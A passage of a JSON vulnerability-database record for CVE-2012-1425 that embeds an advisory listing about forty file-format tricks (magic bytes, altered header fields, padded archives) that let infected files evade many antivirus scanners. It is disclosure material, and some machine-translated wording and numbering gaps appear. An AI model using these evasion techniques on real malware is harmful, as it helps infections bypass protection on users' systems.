            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "kaspersky",
            version: "7.0125",
         },
         {
            model: "jiangmin",
            scope: "eq",
            trust: 0.3,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52580",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1425",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1425",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54706",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1425",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-391",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54706",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By a third party \\50\\4B\\03\\04 Has a character sequence starting with POSIX TAR Malware detection may be avoided via files. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. \nThe following products are affected:\nAVIRA AntiVir Engine 7.11.1.163\nAntiy Antiy-AVL 2.0.3.7\nQuick Heal Technologies CAT-QuickHeal 11.00\nEmsisoft Antivirus 5.1.0.1\nIkarus Antivirus T3.1.1.97.0\nJiangmin 13.0.900\nKaspersky Antivirus 7.0.0.125\nMcAfee 5.400.0.1158\nMcAfee-GW-Edition 2010.1C\nNOD32 5795\nNorman Antivirus 6.06.12\nPCTools Antivirus 7.0.3.5\nSymantec AntiVirus 20101.3.0.103\nTrendMicro 9.120.0.1004\nTrendMicro-HouseCall 9.120.0.1004. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n   evades detection. \n\n   Affected products -\n   ClamAV 0.96.4, CAT-QuickHeal 11.00\n  \n   CVE no - \n   CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n   Symantec 20101.3.0.103\n\n   CVE no - \n   CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n   evades detection. \n\n   Affected products -\n   Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n   Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n   PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n   CVE no - \n   CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n   evades detection. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n   PCTools 7.0.3.5, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n   4 bytes evades detection. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n   3 bytes evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n   offset 29 evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n   evades detection. \n   \n   Affected products -\n   CAT-QuickHeal 11.00,  Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n   evades detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n   CVE no - \n   CVE-2012-1429\n12. Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n   Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n   F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n   nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n   29 evades detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n   6 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n   8 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n   Panda 10.0.2.7\n   \n   CVE no - \n   CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n   offset 30 evades detection. \n   \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n   offset 2 evades detection. \n \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n   offset 526 evades detection. \n   \n   Affected products - \n   Comodo 7425\n   \n   CVE no - \n   CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n   offset 257 evades detection. \n\n   Affected products - \n   Comodo 7425, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1438\n\n21. 'padding' field in ELF files is parsed incorrectly. \n    If an infected ELF file's padding field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1439\n\n22. 'identsize' field in ELF files is parsed incorrectly. \n    If an infected ELF file's identsize field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1440\n\n23. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   Prevx 3.0\n\n   'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',\n    'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and \n    'e_oemid' fields in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0\n\n\n   CVE no - \n   CVE-2012-1441\n\n24. 'class' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's class field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n   Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the \n    user and correctly extracted. Such a file evades detection.  \n    \n   Affected products -\n   ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n   Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n   Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n   VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n   K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n   Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n   Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n   TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n   nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n   Avast5 5.0.677.0, VBA32 3.12.14.2   \n\n   CVE no - \n   CVE-2012-1443\n\n26. 'abiversion' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abiversion field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1444\n\n27. 'abi' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abi field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1445\n\n28. 'encoding' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's encoding field is incremented by 1 it evades\n    detection. 'e_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's e_version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n    Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1447\n\n30. 'cbCabinet' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's cbCabinet field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n   TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n   CVE no - \n   CVE-2012-1448\n\n31. 'vMajor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's vMajor field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n   \n   CVE no - \n   CVE-2012-1449\n\n32. 'reserved3' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1450\n\n33. 'reserved2' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved2 field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1451\n\n34. 'reserved1' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n   \n   CVE no - \n   CVE-2012-1452\n\n35. 'coffFiles' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's coffFiles field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n   Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n   Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n   Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1453\n\n36. 'ei_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n   Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1454\n\n37. 'vMinor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n \n   CVE no - \n   CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n   of a clean TAR archive and a virus-infected ZIP archive, is parsed \n   incorrectly and evades detection. \n\n   Affected products -\n   AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1,\n   eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004\n\n   CVE no - \n   CVE-2012-1456\n\n39. If the length field in the header of a file with test EICAR virus\n   included into a TAR archive is set to be greater than the archive's total \n   length (1,000,000+original length in our experiments), the antivirus \n   declares the file to be clean but virus gets extracted correctly by the \n   GNU tar program. \n\n   Affected products -\n   AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n   AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n   Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n   GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n   Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n   Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n   TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n   CVE no - \n   CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n   scripts, and images compressed using the LZX algorithm. \n   For faster random accesses, the algorithm is reset at intervals\n   instead of compressing the entire file as a single stream. The\n   length of each interval is specified in the LZXC header. \n\n   If an infected CHM file's header modified so that the reset interval\n   is lower than in the original file, the antivirus declares the file\n   to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n   the infected content located before the tampered header. \n\n   Affected products -\n   ClamAV 0.96.4, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n   by a simple checksum. Every header also contains a file length field, which\n   is used by the extractor to locate the next header in the archive. \n\n   If a TAR archive contains two files: the first one is clean, while\n   the second is infected with test EICAR virus - and it is modified such that \n   the length field in the header of the first, clean file to point into the \n   middle of the header of the second, infected file. The antivirus declares \n   the file to be clean but virus gets extracted correctly by the \n   GNU tar program. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, \n   Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, \n   CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, \n   Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n   Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n   K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, \n   Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, \n   PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, \n   Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n   TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, \n   VirusBuster 13.6.151.0 \n\n   CVE no - \n   CVE-2012-1459\n\n42. If an infected tar.gz archive is appended 6 random bytes at the end, \n    the antivirus declares the file to be clean but virus gets extracted by\n    the gunzip+tar programs correctly by ignoring these bytes. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n   K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n   \n   CVE no - \n   CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n    when the contents are extracted. If an infected .tar.gz file is broken \n    into two streams, the antivirus declares the infected .tar.gz file to \n    be clean while tar+gunzip extract the virus correctly\n\n   Affected products -\n   AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n   F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n   CVE no - \n   CVE-2012-1461\n\n44. If an infected ZIP archive is prepended with 1024 random bytes at the \n   beginning, the antivirus declares the file to be clean but virus gets extracted\n   by the unzip program correctly by skipping these bytes\n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n   Symantec 20101.3.0.103 \n\n   CVE no - \n   CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n   for little-endian, 02 for bigendian. Linux kernel, however, does not\n   check this field before loading an ELF file. If an infected ELF file's 5-th \n   byte is set to 02, the antivirus declares the file to be clean but the ELF \n   file gets executed correctly. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n   CVE no - \n   